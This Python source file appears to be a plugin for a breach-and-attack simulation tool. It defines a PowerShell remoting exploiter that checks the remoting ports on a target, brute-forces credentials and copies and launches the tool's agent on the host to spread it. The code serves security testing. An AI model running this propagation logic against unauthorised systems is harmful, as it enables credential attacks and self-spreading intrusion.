import logging
from functools import partial
from pprint import pformat
from typing import Any, Dict

from agentpluginapi import (
    ExploiterResult,
    IAgentBinaryRepository,
    IAgentCommandBuilderFactory,
    IAgentEventPublisher,
    IPropagationCredentialsRepository,
    LocalMachineInfo,
    TargetHost,
)
from monkeytypes import AgentID, Event, OperatingSystem
from plugintoolbox import BruteForceCredentialsProvider, BruteForceExploiter, get_agent_dst_path

from .credentials_generator import generate_powershell_credentials
from .powershell_command_builder import build_powershell_command
from .powershell_consts import POWERSHELL_NO_SSL_PORT, POWERSHELL_SSL_PORT
from .powershell_options import PowerShellOptions
from .powershell_remote_access_client_factory import PowerShellRemoteAccessClientFactory

logger = logging.getLogger(__name__)


def should_attempt_exploit(host: TargetHost) -> bool:
    powershell_ports = {POWERSHELL_NO_SSL_PORT, POWERSHELL_SSL_PORT}
    return not powershell_ports.issubset(host.ports_status.tcp_ports.closed)


class Plugin:
    def __init__(
        self,
        *,
        plugin_name: str,
        agent_id: AgentID,
        agent_event_publisher: IAgentEventPublisher,
        agent_binary_repository: IAgentBinaryRepository,
        local_machine_info: LocalMachineInfo,
        propagation_credentials_repository: IPropagationCredentialsRepository,
        agent_command_builder_factory: IAgentCommandBuilderFactory,
        **kwargs,
    ):
        self._plugin_name = plugin_name
        self._agent_id = agent_id
        self._agent_event_publisher = agent_event_publisher
        self._agent_binary_repository = agent_binary_repository
        running_on_windows = local_machine_info.operating_system == OperatingSystem.WINDOWS
        credentials_generator = partial(
            generate_powershell_credentials,
            running_from_windows=running_on_windows,
        )
        self._credentials_provider = BruteForceCredentialsProvider(
            propagation_credentials_repository, credentials_generator
        )
        self._agent_command_builder_factory = agent_command_builder_factory

    def run(
        self,
        *,
        host: TargetHost,
        options: Dict[str, Any],
        interrupt: Event,
        **kwargs,
    ) -> ExploiterResult:
        try:
            logger.debug(f"Parsing options: {pformat(options)}")
            powershell_options = PowerShellOptions(**options)
        except Exception as err:
            msg = f"Failed to parse PowerShell options: {err}"
            logger.exception(msg)
            return ExploiterResult(error_message=msg)

        if not should_attempt_exploit(host):
            msg = f"Host {host.ip} has no open PowerShell remoting ports"
            logger.debug(msg)
            return ExploiterResult(
                exploitation_success=False, propagation_success=False, error_message=msg
            )

        command_builder = partial(
            build_powershell_command,
            agent_command_builder=(
                self._agent_command_builder_factory.create_windows_agent_command_builder()
            ),
        )
        powershell_exploit_client_factory = PowerShellRemoteAccessClientFactory(
            host, powershell_options, command_builder
        )

        brute_force_exploiter = BruteForceExploiter(
            self._plugin_name,
            self._agent_id,
            get_agent_dst_path(host),
            powershell_exploit_client_factory,
            self._credentials_provider,
            self._agent_binary_repository,
            self._agent_event_publisher,
            {"powershell-exploiter"},
        )

        try:
            logger.debug(f"Running PowerShell exploiter on host {host.ip}")
            return brute_force_exploiter.exploit_host(host, interrupt)
        except Exception as err:
            msg = f"An unexpected exception occurred while attempting to exploit host: {err}"
            logger.exception(msg)
            return ExploiterResult(error_message=msg)
